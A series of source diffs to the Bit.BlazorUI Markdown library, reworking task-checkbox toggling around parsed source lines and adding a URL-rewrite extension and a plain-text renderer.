     /// <paramref name="isChecked"/>. The source is returned unchanged when there is no such marker.
     /// </summary>
     /// <remarks>
-    /// Markers inside a fenced code block are skipped, so a document that documents the task syntax
-    /// still counts the same boxes the renderer drew. Indentation is not treated as code, because
-    /// an indented line under a list item is a nested task and those are the common case; a task
-    /// marker inside an <em>indented</em> code block is the one shape this counts and the renderer
-    /// does not.
+    /// The source is parsed to find the marker, with the flavors <see cref="BitMarkdownPipelines"/>
+    /// calls advanced. A document rendered through a pipeline of your own should be toggled through
+    /// the overload taking it, since it is the pipeline that decides which markers are tasks at all.
     /// </remarks>
     public static string Toggle(string? markdown, int index, bool isChecked)
+        => Toggle(markdown, index, isChecked, null);
+
+    /// <summary>
+    /// Returns <paramref name="markdown"/> with the task marker at <paramref name="index"/> set to
+    /// <paramref name="isChecked"/>, finding it with <paramref name="pipeline"/> - the one the
+    /// document is rendered with, so the markers counted here are the boxes the reader sees.
+    /// </summary>
+    public static string Toggle(string? markdown, int index, bool isChecked, BitMarkdownPipeline? pipeline)
     {
         if (string.IsNullOrEmpty(markdown) || index < 0) return markdown ?? string.Empty;
 
-        var lines = markdown.Split('\n');
-        string? fence = null;
-        int found = 0;
-
-        for (int i = 0; i < lines.Length; i++)
+        foreach (var checkbox in Checkboxes(markdown, pipeline))
         {
-            string line = lines[i];
-            string body = line.EndsWith('\r') ? line[..^1] : line;
-
-            var fenceMatch = CodeFence().Match(body);
-            if (fenceMatch.Success)
-            {
-                string marker = fenceMatch.Groups[1].Value;
-                if (fence is null) fence = marker;
-                else if (marker[0] == fence[0] && marker.Length >= fence.Length) fence = null;
-                continue;
-            }
-            if (fence is not null) continue;
-
-            var match = TaskLine().Match(body);
-            if (match.Success is false) continue;
-
-            if (found++ != index) continue;
-
-            string rewritten = match.Groups[1].Value + (isChecked ? "x" : " ") + match.Groups[3].Value;
-            lines[i] = line.EndsWith('\r') ? rewritten + "\r" : rewritten;
-            return string.Join("\n", lines);
+            if (checkbox.Index == index) return Toggle(markdown, checkbox, isChecked);
         }
 
         return markdown;
     }
 
     /// <summary>
-    /// Counts the task markers in <paramref name="markdown"/>, using the same rules
-    /// <see cref="Toggle"/> counts them with.
+    /// Returns <paramref name="markdown"/> with the marker <paramref name="checkbox"/> was parsed
+    /// from set to <paramref name="isChecked"/>. This is the exact overload: the box carries the
+    /// line it came from, so nothing has to be searched for and nothing can be mismatched. The
+    /// source is returned unchanged when the box was not parsed from it.
     /// </summary>
-    public static int Count(string? markdown)
+    public static string Toggle(string? markdown, BitMarkdownTaskCheckboxNode checkbox, bool isChecked)
+    {
+        ArgumentNullException.ThrowIfNull(checkbox);
+
+        if (string.IsNullOrEmpty(markdown) || checkbox.SourceLine < 0) return markdown ?? string.Empty;
+        if (TryGetLine(markdown, checkbox.SourceLine, out int start, out int end) is false) return markdown;
+
+        // The marker opens the item's content, and only indentation and the list marker itself
+        // come before it, so the first box on the line is the one to rewrite.
+        int box = IndexOfBox(markdown, start, end);
+        if (box < 0) return markdown;
+
+        return string.Concat(markdown.AsSpan(0, box), isChecked ? "x" : " ", markdown.AsSpan(box + 1));
+    }
+
+    /// <summary>
+    /// Counts the task markers in <paramref name="markdown"/> - the boxes a viewer showing it draws.
+    /// </summary>
+    public static int Count(string? markdown) => Count(markdown, null);
+
+    /// <summary>
+    /// Counts the task markers <paramref name="pipeline"/> finds in <paramref name="markdown"/> -
+    /// the boxes a viewer rendering it through that pipeline draws.
+    /// </summary>
+    public static int Count(string? markdown, BitMarkdownPipeline? pipeline)
     {
         if (string.IsNullOrEmpty(markdown)) return 0;
 
         int count = 0;
-        string? fence = null;
-        foreach (var raw in markdown.Split('\n'))
-        {
-            string body = raw.EndsWith('\r') ? raw[..^1] : raw;
+        foreach (var _ in Checkboxes(markdown, pipeline)) count++;
+        return count;
+    }
 
-            var fenceMatch = CodeFence().Match(body);
-            if (fenceMatch.Success)
+    private static IEnumerable<BitMarkdownTaskCheckboxNode> Checkboxes(string markdown, BitMarkdownPipeline? pipeline)
+        => BitMarkdownAstHelper
+            .Descendants((pipeline ?? _pipeline.Value).Parse(markdown))
+            .OfType<BitMarkdownTaskCheckboxNode>();
+
+    // The index of the "[" ... "]" box's state character within the given line, or -1 when the
+    // line holds none.
+    private static int IndexOfBox(string markdown, int start, int end)
+    {
+        for (int i = start; i + 2 < end; i++)
+        {
+            if (markdown[i] != '[') continue;
+            if (markdown[i + 1] is not (' ' or 'x' or 'X')) continue;
+            if (markdown[i + 2] != ']') continue;
+            return i + 1;
+        }
+        return -1;
+    }
+
+    // The bounds of the given line's content within the source, excluding its terminator. The line
+    // boundaries are the parser's own - "\n", "\r" and "\r\n" - so the index a node reports means
+    // the same line here as it did there. Working in the original string, rather than splitting and
+    // re-joining it, is also what keeps every line ending exactly as the author wrote it.
+    private static bool TryGetLine(string markdown, int line, out int start, out int end)
+    {
+        start = 0;
+        int current = 0;
+
+        for (int i = 0; i < markdown.Length; i++)
+        {
+            char ch = markdown[i];
+            if (ch is not ('\n' or '\r')) continue;
+
+            if (current == line)
             {
-                string marker = fenceMatch.Groups[1].Value;
-                if (fence is null) fence = marker;
-                else if (marker[0] == fence[0] && marker.Length >= fence.Length) fence = null;
-                continue;
+                end = i;
+                return true;
             }
-            if (fence is not null) continue;
-            if (TaskLine().IsMatch(body)) count++;
+
+            current++;
+            // "\r\n" is a single line boundary.
+            if (ch == '\r' && i + 1 < markdown.Length && markdown[i + 1] == '\n') i++;
+            start = i + 1;
         }
 
-        return count;
+        end = markdown.Length;
+        return current == line;
     }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTaskList.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTaskList.cs
@@ -1,0 +1,97 @@
+using System.Text.RegularExpressions;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Helpers for editing task markers in a Markdown source, so a ticked box can be written back into
+/// the document it came from.
+/// </summary>
+public static partial class BitMarkdownTaskList
+{
+    // A list marker followed by a task box. The three parts are captured separately so the box can
+    // be rewritten without touching the indentation or the marker.
+    [GeneratedRegex(@"^([ \t]*(?:[-+*]|[0-9]{1,9}[.)])[ \t]+\[)([ xX])(\].*)$", RegexOptions.None, matchTimeoutMilliseconds: 1000)]
+    private static partial Regex TaskLine();
+
+    // The fence that opens or closes a code block, whose contents are not Markdown and whose
+    // "- [ ]" lines are therefore not tasks.
+    [GeneratedRegex(@"^ {0,3}(`{3,}|~{3,})", RegexOptions.None, matchTimeoutMilliseconds: 1000)]
+    private static partial Regex CodeFence();
+
+    /// <summary>
+    /// Returns <paramref name="markdown"/> with the task marker at <paramref name="index"/> - the
+    /// index the viewer reports, counted from 0 in reading order - set to
+    /// <paramref name="isChecked"/>. The source is returned unchanged when there is no such marker.
+    /// </summary>
+    /// <remarks>
+    /// Markers inside a fenced code block are skipped, so a document that documents the task syntax
+    /// still counts the same boxes the renderer drew. Indentation is not treated as code, because
+    /// an indented line under a list item is a nested task and those are the common case; a task
+    /// marker inside an <em>indented</em> code block is the one shape this counts and the renderer
+    /// does not.
+    /// </remarks>
+    public static string Toggle(string? markdown, int index, bool isChecked)
+    {
+        if (string.IsNullOrEmpty(markdown) || index < 0) return markdown ?? string.Empty;
+
+        var lines = markdown.Split('\n');
+        string? fence = null;
+        int found = 0;
+
+        for (int i = 0; i < lines.Length; i++)
+        {
+            string line = lines[i];
+            string body = line.EndsWith('\r') ? line[..^1] : line;
+
+            var fenceMatch = CodeFence().Match(body);
+            if (fenceMatch.Success)
+            {
+                string marker = fenceMatch.Groups[1].Value;
+                if (fence is null) fence = marker;
+                else if (marker[0] == fence[0] && marker.Length >= fence.Length) fence = null;
+                continue;
+            }
+            if (fence is not null) continue;
+
+            var match = TaskLine().Match(body);
+            if (match.Success is false) continue;
+
+            if (found++ != index) continue;
+
+            string rewritten = match.Groups[1].Value + (isChecked ? "x" : " ") + match.Groups[3].Value;
+            lines[i] = line.EndsWith('\r') ? rewritten + "\r" : rewritten;
+            return string.Join("\n", lines);
+        }
+
+        return markdown;
+    }
+
+    /// <summary>
+    /// Counts the task markers in <paramref name="markdown"/>, using the same rules
+    /// <see cref="Toggle"/> counts them with.
+    /// </summary>
+    public static int Count(string? markdown)
+    {
+        if (string.IsNullOrEmpty(markdown)) return 0;
+
+        int count = 0;
+        string? fence = null;
+        foreach (var raw in markdown.Split('\n'))
+        {
+            string body = raw.EndsWith('\r') ? raw[..^1] : raw;
+
+            var fenceMatch = CodeFence().Match(body);
+            if (fenceMatch.Success)
+            {
+                string marker = fenceMatch.Groups[1].Value;
+                if (fence is null) fence = marker;
+                else if (marker[0] == fence[0] && marker.Length >= fence.Length) fence = null;
+                continue;
+            }
+            if (fence is not null) continue;
+            if (TaskLine().IsMatch(body)) count++;
+        }
+
+        return count;
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTaskListAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTaskListAstProcessor.cs
@@ -35,7 +35,16 @@ public sealed partial class BitMarkdownTaskListAstProcessor : BitMarkdownAstProc
 
                 text.Text = m.Groups[2].Value;
                 para.Inlines.Insert(0, new BitMarkdownTaskCheckboxNode { Checked = raw.Groups[1].Value is "x" or "X" });
+                item.IsTask = true;
             }
+        }
+
+        // Numbered in reading order once the whole tree is known, so a checkbox can name the
+        // marker it stands for in the source no matter how deeply its list is nested.
+        int index = 0;
+        foreach (var checkbox in BitMarkdownAstHelper.Descendants(document).OfType<BitMarkdownTaskCheckboxNode>())
+        {
+            checkbox.Index = index++;
         }
     }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTaskListAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownTaskListAstProcessor.cs
@@ -34,7 +34,13 @@ public sealed partial class BitMarkdownTaskListAstProcessor : BitMarkdownAstProc
                 if (!m.Success) continue;
 
                 text.Text = m.Groups[2].Value;
-                para.Inlines.Insert(0, new BitMarkdownTaskCheckboxNode { Checked = raw.Groups[1].Value is "x" or "X" });
+                para.Inlines.Insert(0, new BitMarkdownTaskCheckboxNode
+                {
+                    Checked = raw.Groups[1].Value is "x" or "X",
+                    // The marker is the start of the item's first line, so the box is written back
+                    // into the very line the parser read it from.
+                    SourceLine = item.SourceLine
+                });
                 item.IsTask = true;
             }
         }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownUrlRewriteAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownUrlRewriteAstProcessor.cs
@@ -1,0 +1,68 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Runs a caller-supplied rewrite over every link and image destination in the document - what a
+/// README written for a repository needs before it can be shown anywhere else, since every
+/// relative path in it points at the repository rather than at the site rendering it.
+/// </summary>
+/// <remarks>
+/// The rewrite runs after the URL has already been sanitized, and its result is sanitized again
+/// before it reaches the DOM, so a rewriter cannot - by accident or otherwise - reintroduce a
+/// <c>javascript:</c> destination. Returning <c>null</c> or an empty string drops the destination
+/// and leaves the link's text (or the image's alt) behind.
+/// </remarks>
+public sealed class BitMarkdownUrlRewriteAstProcessor : BitMarkdownAstProcessor
+{
+    private readonly Func<BitMarkdownUrlRewriteContext, string?> _rewrite;
+
+    public BitMarkdownUrlRewriteAstProcessor(Func<BitMarkdownUrlRewriteContext, string?> rewrite)
+    {
+        ArgumentNullException.ThrowIfNull(rewrite);
+        _rewrite = rewrite;
+    }
+
+    // Last: every flavor that creates links (autolink literals, footnotes, reference links) has
+    // to have created them before the destinations are rewritten.
+    public override int Order => 1000;
+
+    public override void Process(BitMarkdownDocumentNode document, BitMarkdownPipeline pipeline)
+    {
+        BitMarkdownAstHelper.VisitChildLists(document, list =>
+        {
+            for (int i = 0; i < list.Count; i++)
+            {
+                switch (list[i])
+                {
+                    case BitMarkdownLinkNode link:
+                        string linkUrl = Rewrite(link.Url, isImage: false);
+                        if (linkUrl == link.Url) break;
+                        // Url is init-only, so the node is replaced by an identical one.
+                        var replacement = new BitMarkdownLinkNode { Url = linkUrl, Title = link.Title };
+                        replacement.Children.AddRange(link.Children);
+                        list[i] = replacement;
+                        break;
+
+                    case BitMarkdownImageNode image:
+                        string imageUrl = Rewrite(image.Url, isImage: true);
+                        if (imageUrl == image.Url) break;
+                        list[i] = new BitMarkdownImageNode
+                        {
+                            Url = imageUrl,
+                            Title = image.Title,
+                            Alt = image.Alt
+                        };
+                        break;
+                }
+            }
+        });
+    }
+
+    private string Rewrite(string url, bool isImage)
+    {
+        string? rewritten = _rewrite(new BitMarkdownUrlRewriteContext(url, isImage));
+        if (rewritten is null || rewritten.Length == 0) return string.Empty;
+        if (rewritten == url) return url;
+
+        return BitMarkdownUrlSanitizer.Sanitize(rewritten, isImage);
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownUrlRewriteAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownUrlRewriteAstProcessor.cs
@@ -1,4 +1,4 @@
-namespace Bit.BlazorUI;
+﻿namespace Bit.BlazorUI;
 
 /// <summary>
 /// Runs a caller-supplied rewrite over every link and image destination in the document - what a
@@ -37,7 +37,7 @@ public sealed class BitMarkdownUrlRewriteAstProcessor : BitMarkdownAstProcessor
                         string linkUrl = Rewrite(link.Url, isImage: false);
                         if (linkUrl == link.Url) break;
                         // Url is init-only, so the node is replaced by an identical one.
-                        var replacement = new BitMarkdownLinkNode { Url = linkUrl, Title = link.Title };
+                        var replacement = new BitMarkdownLinkNode { Url = linkUrl, Title = link.Title, IsAutoLink = link.IsAutoLink };
                         replacement.Children.AddRange(link.Children);
                         list[i] = replacement;
                         break;

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownUrlRewriteContext.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownUrlRewriteContext.cs
@@ -1,0 +1,33 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// What a URL rewriter is told about the destination it is being asked to rewrite: the URL as the
+/// author wrote it (already sanitized) and whether it belongs to an image or to a link.
+/// </summary>
+/// <param name="Url">The sanitized destination, exactly as it would otherwise be rendered.</param>
+/// <param name="IsImage">True for an image source, false for a link destination.</param>
+public readonly record struct BitMarkdownUrlRewriteContext(string Url, bool IsImage)
+{
+    /// <summary>
+    /// True when the URL is relative - it has no scheme and does not begin with <c>//</c> - which
+    /// is what a rewriter resolving a document against a base address is looking for. A fragment
+    /// (<c>#section</c>) is not relative in this sense: it points inside the rendered page and
+    /// resolving it elsewhere would break every heading link in the document.
+    /// </summary>
+    public bool IsRelative
+    {
+        get
+        {
+            if (string.IsNullOrEmpty(Url)) return false;
+            if (Url[0] == '#') return false;
+            if (Url.StartsWith("//", StringComparison.Ordinal)) return false;
+
+            int colon = Url.IndexOf(':');
+            if (colon < 0) return true;
+
+            // A ':' that comes after a '/', '?' or '#' belongs to the path, not to a scheme.
+            int separator = Url.IndexOfAny(['/', '?', '#']);
+            return separator >= 0 && separator < colon;
+        }
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownUrlRewriteExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownUrlRewriteExtension.cs
@@ -48,11 +48,23 @@ public sealed class BitMarkdownUrlRewriteExtension : IBitMarkdownExtension
                 return resolved.ToString();
             }
 
+            // A root-relative destination is already resolved against the site root, which is
+            // exactly what the absolute-base branch above does with one ("/img/x" under
+            // "https://b.com/r/" is "https://b.com/img/x"). A site-relative prefix therefore
+            // leaves it alone rather than prepending itself and pointing at nothing.
+            if (relative.StartsWith('/')) return relative;
+
             // A relative base ("/docs/") cannot be resolved by Uri, so the two are joined by
             // hand - which is all a site-relative prefix ever needed.
-            return prefix + relative.TrimStart('/');
+            return prefix + relative;
         });
     }
+
+    // Several rewrites may be registered, each running in turn, so a base URL and a rewriter of
+    // one's own compose. Refusing the second - which is the only other honest option, since the
+    // extension is nothing but the function it was handed - would rule out the one combination
+    // this pair is most often written as.
+    public bool AllowsMultiple => true;
 
     public void Setup(BitMarkdownPipelineBuilder builder)
         => builder.AstProcessors.Add(new BitMarkdownUrlRewriteAstProcessor(_rewrite));

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownUrlRewriteExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownUrlRewriteExtension.cs
@@ -1,0 +1,59 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Rewrites every link and image destination in the document through a function of your own -
+/// resolving a README's relative paths against the repository it came from, pointing images at a
+/// CDN, or stripping tracking parameters.
+/// </summary>
+public sealed class BitMarkdownUrlRewriteExtension : IBitMarkdownExtension
+{
+    private readonly Func<BitMarkdownUrlRewriteContext, string?> _rewrite;
+
+    /// <summary>Creates the extension around the rewrite to run.</summary>
+    /// <remarks>
+    /// A pipeline is shared across concurrent parses, so the function must be pure and
+    /// thread-safe: given the same URL it has to return the same result, whoever is asking.
+    /// </remarks>
+    public BitMarkdownUrlRewriteExtension(Func<BitMarkdownUrlRewriteContext, string?> rewrite)
+    {
+        ArgumentNullException.ThrowIfNull(rewrite);
+        _rewrite = rewrite;
+    }
+
+    /// <summary>
+    /// Creates an extension that resolves every relative destination against
+    /// <paramref name="baseUrl"/>, leaving absolute ones and in-page fragments alone.
+    /// </summary>
+    public static BitMarkdownUrlRewriteExtension ForBaseUrl(string baseUrl)
+    {
+        ArgumentException.ThrowIfNullOrWhiteSpace(baseUrl);
+
+        // Resolved once, so every document parsed through this pipeline pays for it once.
+        if (Uri.TryCreate(baseUrl, UriKind.Absolute, out var absoluteBase) is false)
+        {
+            absoluteBase = null;
+        }
+        string prefix = baseUrl.EndsWith('/') ? baseUrl : baseUrl + "/";
+
+        return new BitMarkdownUrlRewriteExtension(context =>
+        {
+            if (context.IsRelative is false) return context.Url;
+
+            string relative = context.Url.StartsWith("./", StringComparison.Ordinal)
+                ? context.Url[2..]
+                : context.Url;
+
+            if (absoluteBase is not null && Uri.TryCreate(absoluteBase, relative, out var resolved))
+            {
+                return resolved.ToString();
+            }
+
+            // A relative base ("/docs/") cannot be resolved by Uri, so the two are joined by
+            // hand - which is all a site-relative prefix ever needed.
+            return prefix + relative.TrimStart('/');
+        });
+    }
+
+    public void Setup(BitMarkdownPipelineBuilder builder)
+        => builder.AstProcessors.Add(new BitMarkdownUrlRewriteAstProcessor(_rewrite));
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownUrlRewriteExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownUrlRewriteExtension.cs
@@ -29,9 +29,15 @@ public sealed class BitMarkdownUrlRewriteExtension : IBitMarkdownExtension
         ArgumentException.ThrowIfNullOrWhiteSpace(baseUrl);
 
         // Resolved once, so every document parsed through this pipeline pays for it once.
-        if (Uri.TryCreate(baseUrl, UriKind.Absolute, out var absoluteBase) is false)
+        //
+        // A site-relative base ("/docs/") is ruled out before parsing: on Unix, Uri reads a rooted
+        // path as an absolute file:// URI, so every destination resolved against it came back as
+        // "file:///docs/x" - which the viewer's sanitizer then dropped, leaving no href at all.
+        // Ruling it out here is what makes the same base behave the same on every platform.
+        Uri? absoluteBase = null;
+        if (baseUrl.StartsWith('/') is false && Uri.TryCreate(baseUrl, UriKind.Absolute, out var parsed))
         {
-            absoluteBase = null;
+            absoluteBase = parsed;
         }
         string prefix = baseUrl.EndsWith('/') ? baseUrl : baseUrl + "/";
 

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownAstHelper.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownAstHelper.cs
@@ -52,6 +52,87 @@ public static class BitMarkdownAstHelper
         }
     }
 
+    /// <summary>
+    /// Renders the whole subtree as plain text: what the document says, with none of the markup it
+    /// says it with. Blocks are separated by a blank line, so the result reads as paragraphs rather
+    /// than as one run-on sentence.
+    /// </summary>
+    /// <remarks>
+    /// This is the text a search index, an excerpt or a meta description is built from, and it is
+    /// read off the parsed tree rather than off the source, so the syntax characters, the link
+    /// destinations and the reference definitions are all already gone.
+    /// </remarks>
+    public static string ToPlainText(BitMarkdownNode node)
+    {
+        ArgumentNullException.ThrowIfNull(node);
+
+        var sb = new System.Text.StringBuilder();
+        Append(node, sb);
+        return sb.ToString().Trim();
+
+        static void Append(BitMarkdownNode current, System.Text.StringBuilder sb)
+        {
+            switch (current)
+            {
+                case BitMarkdownTextNode text:
+                    sb.Append(text.Text);
+                    return;
+
+                case BitMarkdownCodeSpanNode code:
+                    sb.Append(code.Content);
+                    return;
+
+                case BitMarkdownCodeBlockNode block:
+                    sb.Append(block.Content);
+                    Separate(sb);
+                    return;
+
+                case BitMarkdownImageNode image:
+                    sb.Append(image.Alt);
+                    return;
+
+                case BitMarkdownLineBreakNode:
+                    sb.Append(' ');
+                    return;
+
+                // Two flavors put their text on the node itself rather than in a child text run.
+                case BitMarkdownMathNode math:
+                    sb.Append(math.Content);
+                    return;
+
+                case BitMarkdownAbbreviationNode abbreviation:
+                    sb.Append(abbreviation.Text);
+                    return;
+            }
+
+            bool first = true;
+            foreach (var list in current.ChildLists)
+            {
+                // A node with several child collections is a grid of them - a table's cells are the
+                // only one - and running them together would read as one word.
+                if (first is false && sb.Length > 0 && char.IsWhiteSpace(sb[^1]) is false) sb.Append(' ');
+                first = false;
+
+                foreach (var child in list) Append(child, sb);
+            }
+
+            // A block ends a line of prose; an inline does not.
+            if (current is BitMarkdownParagraphNode or BitMarkdownHeadingNode or BitMarkdownListItemNode
+                        or BitMarkdownBlockquoteNode or BitMarkdownThematicBreakNode
+                        or BitMarkdownTableNode or BitMarkdownContainerNode or BitMarkdownFigureNode
+                        or BitMarkdownDefinitionTermNode or BitMarkdownDefinitionDescriptionNode)
+            {
+                Separate(sb);
+            }
+        }
+
+        static void Separate(System.Text.StringBuilder sb)
+        {
+            if (sb.Length > 0 && sb[^1] != '\n') sb.Append('\n');
+            sb.Append('\n');
+        }
+    }
+
     private static void PushChildrenReversed(BitMarkdownNode node, Stack<BitMarkdownNode> stack)
     {
         // Push children across all child lists in reverse document order (last list

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownAutolinkInlineParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownAutolinkInlineParser.cs
@@ -1,4 +1,4 @@
-namespace Bit.BlazorUI;
+﻿namespace Bit.BlazorUI;
 
 /// <summary>Handles CommonMark angle-bracket autolinks: <c>&lt;https://...&gt;</c>.</summary>
 public sealed partial class BitMarkdownAutolinkInlineParser : BitMarkdownInlineParser
@@ -56,7 +56,7 @@ public sealed partial class BitMarkdownAutolinkInlineParser : BitMarkdownInlineP
 
     private static void Emit(BitMarkdownInlineProcessor state, string href, string label, int close)
     {
-        var link = new BitMarkdownLinkNode { Url = BitMarkdownUrlSanitizer.Sanitize(href, isImage: false) };
+        var link = new BitMarkdownLinkNode { Url = BitMarkdownUrlSanitizer.Sanitize(href, isImage: false), IsAutoLink = true };
         link.Children.Add(new BitMarkdownTextNode(label));
         state.AppendNode(link);
         state.Pos = close + 1;

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownBlockProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownBlockProcessor.cs
@@ -8,17 +8,21 @@ namespace Bit.BlazorUI;
 public sealed class BitMarkdownBlockProcessor
 {
     internal BitMarkdownBlockProcessor(BitMarkdownPipeline pipeline, IReadOnlyList<string> lines)
-        : this(pipeline, lines, BitMarkdownParseContext.Empty, 0)
+        : this(pipeline, lines, BitMarkdownParseContext.Empty, 0, UnknownLine)
     {
     }
 
-    internal BitMarkdownBlockProcessor(BitMarkdownPipeline pipeline, IReadOnlyList<string> lines, BitMarkdownParseContext context, int depth)
+    internal BitMarkdownBlockProcessor(BitMarkdownPipeline pipeline, IReadOnlyList<string> lines, BitMarkdownParseContext context, int depth, int lineOffset)
     {
         Pipeline = pipeline;
         Lines = lines;
         Context = context;
         Depth = depth;
+        LineOffset = lineOffset;
     }
+
+    /// <summary>The value a source line takes when it cannot be traced back to the document.</summary>
+    internal const int UnknownLine = -1;
 
     public BitMarkdownPipeline Pipeline { get; }
 
@@ -51,6 +55,23 @@ public sealed class BitMarkdownBlockProcessor
     /// <summary>Index of the line currently being considered.</summary>
     public int Line { get; set; }
 
+    /// <summary>
+    /// The document line <c>Lines[0]</c> was taken from, or <see cref="UnknownLine"/> when these
+    /// lines cannot be traced back to it. Every container that recurses hands its inner lines the
+    /// document line the first of them came from, so a node parsed inside a list item inside a
+    /// block quote still knows which line of the source it was written on.
+    /// </summary>
+    internal int LineOffset { get; }
+
+    /// <summary>
+    /// The document line <paramref name="localLine"/> of this scope was written on, or
+    /// <see cref="UnknownLine"/> when it cannot be traced back to the source. This is what lets a
+    /// node be edited in the source it came from - a ticked task box being written back into its
+    /// own <c>[ ]</c> marker - without a second scanner that has to agree with this parser.
+    /// </summary>
+    public int SourceLine(int localLine)
+        => LineOffset == UnknownLine ? UnknownLine : LineOffset + localLine;
+
     internal List<BitMarkdownNode> Run()
     {
         var output = new List<BitMarkdownNode>();
@@ -72,8 +93,21 @@ public sealed class BitMarkdownBlockProcessor
         return output;
     }
 
-    /// <summary>Recursively parses a nested set of lines (list items, block quotes).</summary>
-    public List<BitMarkdownNode> ParseBlocks(IReadOnlyList<string> lines) => Pipeline.ParseBlocks(lines, Context, Depth + 1);
+    /// <summary>
+    /// Recursively parses a nested set of lines (list items, block quotes) that cannot be traced
+    /// back to the document's own lines.
+    /// </summary>
+    public List<BitMarkdownNode> ParseBlocks(IReadOnlyList<string> lines)
+        => Pipeline.ParseBlocks(lines, Context, Depth + 1, UnknownLine);
+
+    /// <summary>
+    /// Recursively parses a nested set of lines, the first of which was taken from
+    /// <paramref name="firstLine"/> of this scope. Pass the local index the inner lines start at -
+    /// they have to map one-to-one onto the lines from there - so the nested nodes keep knowing
+    /// which document line they were written on.
+    /// </summary>
+    public List<BitMarkdownNode> ParseBlocks(IReadOnlyList<string> lines, int firstLine)
+        => Pipeline.ParseBlocks(lines, Context, Depth + 1, SourceLine(firstLine));
 
     /// <summary>Parses inline content using the pipeline's inline parsers.</summary>
     public List<BitMarkdownNode> ParseInlines(string text) => Pipeline.ParseInlines(text, Context, Depth + 1);

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownBlockProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownBlockProcessor.cs
@@ -8,22 +8,32 @@ namespace Bit.BlazorUI;
 public sealed class BitMarkdownBlockProcessor
 {
     internal BitMarkdownBlockProcessor(BitMarkdownPipeline pipeline, IReadOnlyList<string> lines)
-        : this(pipeline, lines, BitMarkdownParseOptions.Default, 0)
+        : this(pipeline, lines, BitMarkdownParseContext.Empty, 0)
     {
     }
 
-    internal BitMarkdownBlockProcessor(BitMarkdownPipeline pipeline, IReadOnlyList<string> lines, BitMarkdownParseOptions options, int depth)
+    internal BitMarkdownBlockProcessor(BitMarkdownPipeline pipeline, IReadOnlyList<string> lines, BitMarkdownParseContext context, int depth)
     {
         Pipeline = pipeline;
         Lines = lines;
-        Options = options;
+        Context = context;
         Depth = depth;
     }
 
     public BitMarkdownPipeline Pipeline { get; }
 
+    /// <summary>The state shared by every parser taking part in this parse.</summary>
+    internal BitMarkdownParseContext Context { get; }
+
     /// <summary>The safety limits in effect for this parse.</summary>
-    internal BitMarkdownParseOptions Options { get; }
+    internal BitMarkdownParseOptions Options => Context.Options;
+
+    /// <summary>
+    /// True when the document declares a <c>[label]:</c> definition line for the supplied
+    /// (already normalized) label. Block and inline parsers consult this before treating
+    /// bracketed text as a reference, since definitions may appear after their references.
+    /// </summary>
+    public bool HasReferenceLabel(string normalizedLabel) => Context.ReferenceLabels.Contains(normalizedLabel);
 
     /// <summary>The current nesting depth of this processor within the document.</summary>
     internal int Depth { get; }
@@ -56,10 +66,10 @@ public sealed class BitMarkdownBlockProcessor
     }
 
     /// <summary>Recursively parses a nested set of lines (list items, block quotes).</summary>
-    public List<BitMarkdownNode> ParseBlocks(IReadOnlyList<string> lines) => Pipeline.ParseBlocks(lines, Options, Depth + 1);
+    public List<BitMarkdownNode> ParseBlocks(IReadOnlyList<string> lines) => Pipeline.ParseBlocks(lines, Context, Depth + 1);
 
     /// <summary>Parses inline content using the pipeline's inline parsers.</summary>
-    public List<BitMarkdownNode> ParseInlines(string text) => Pipeline.ParseInlines(text, Options, Depth + 1);
+    public List<BitMarkdownNode> ParseInlines(string text) => Pipeline.ParseInlines(text, Context, Depth + 1);
 
     /// <summary>True if any block parser (other than the paragraph fallback) starts at the line.</summary>
     public bool StartsBlock(int lineIndex)

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownBlockProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Parsing/BitMarkdownBlockProcessor.cs
